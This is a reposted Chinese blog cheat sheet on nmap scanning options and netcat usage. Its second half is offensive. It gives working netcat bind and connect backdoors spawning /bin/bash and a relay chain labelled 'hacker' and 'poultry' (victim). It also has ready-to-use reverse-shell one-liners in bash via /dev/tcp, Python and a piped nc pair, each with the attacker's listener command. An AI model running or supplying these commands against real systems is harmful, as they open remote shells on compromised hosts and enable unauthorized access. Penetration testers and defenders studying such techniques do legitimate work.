码迷,mamicode.com
首页 > 其他好文 > 详细

namp & ncat

时间:2020-07-08 09:14:15      阅读:71      评论:0      收藏:0      [点我收藏+]

标签:脚本   ann   请求   font   net   cat   反弹shell   info   etc   

  

--dns-servers
是复数,主要用于内部架设的dns服务器,外部dns无法解析.
-Pn Treat all hosts as online --- skip host discovery
明确知道主机存活或防火墙开启的机器,-Pn不启用探测前的ICMP请求,达到不触发防火墙的安全机制

-F fast mode scan fewer ports than the default scan 扫描100个最常用的端口

-p -p m-n 指定端口
-p 80,135
-p ssh 只能扫描ssh默认端口22
修改端口后,加-sV选项可识别出修改端口后的服务
-p T:23,U:23-100 nmap默认只扫描tcp端口,tcp 和 udp 一起扫描需同时加 -sT -sU 选项
-p s*

UDP 被fw屏蔽后,会显示open|filtered,但是TCP显示filtered
UDP 只有服务监听于默认端口,才会显示open,监听于非默认端口也显示open|filtered bind例子 ncat监视端口显示closed(ncat无回应)

服务的指纹信息 服务的端口,服务名,版本

-A enable version detection OS detection script scanning traceroute

-T[0-5] set timing template higher is faster -A 耗时很长 -T5大大加速

-sV probe open ports to determine services/version info 实现 version detection 功能

-O os detection

-sn ping scan disable port scan
加-v 显示所有的
不加-v 只显示up的
-sS TCP SYN

-o[AXN] 保存为所有的,xml,文本

-e using specified interface



nmap四大主要功能
1) 主机发现(host discovery)
2) 端口扫描(port scanning)
3) 版本侦测(version detection)
4) OS侦测(operation system detection)

CIDR classless inter-domain routing


脚本相关

nmap -sV --script="version,discovery" target

nmap -sV -T5 -v --script vuln target 探测目标漏洞

nmap --script http-title|http-headers target

nmap -sS -sU -T5 --top-ports 100 ip TCP SYN扫描tcp,同时扫描udp,nmap-services中前100个端口(开放概率排名,nmap默认会扫描概率
最高的1000个端口)

 


nc

获取banner信息
echo ‘ ‘|nc -nv -w2 ip port_range 不使用z选项 kali中的可用,其他都有问题
扫描端口
nc -nvz -w2 ip port_range 可扫描外网主机

nc -l -w3 -z -v -u -p 987 < preempt.txt

nc -l -p 789 -e cmd

netcat 一切数据通过stdin/stdout实现

监听型后门
nc -l -p 889 -e /bin/bash

nc ip port

连接型后门
nc ip port -e /bin/bash

nc -l -p 889


-z zero I/O mode,userd for scanning 发送的数据报中不包含任何的payload

-s source address

-w seconds timeout

连接转发
relay host:
#!/bin/env bash
nc ip1(poultry) port1

nc -l -p port2 -e relay.sh

hacker:
nc ip(relay host) port2

poultry:
nc -l -p port1 -e /bin/bash

netcat反弹shell(bash)
bash -i >& /dev/tcp/ip(hacker)/port(hacker监听的port) 0>&1

hacker:
ncat -lvp port

python反弹shell
python -c "import os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip‘,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([‘/bin/bash‘,‘-i‘]);"

hacker:
ncat -lvp port

ncat反弹shell(不支持 -e)
poultry:
nc ip port|/bin/bash|nc ip port+1

hacker:
开启两个terminal,
nc -lvp port 输入命令
nc -lvp port+1 显示结果

 

namp & ncat

标签:脚本   ann   请求   font   net   cat   反弹shell   info   etc   

原文地址:https://www.cnblogs.com/dissipate/p/13264584.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!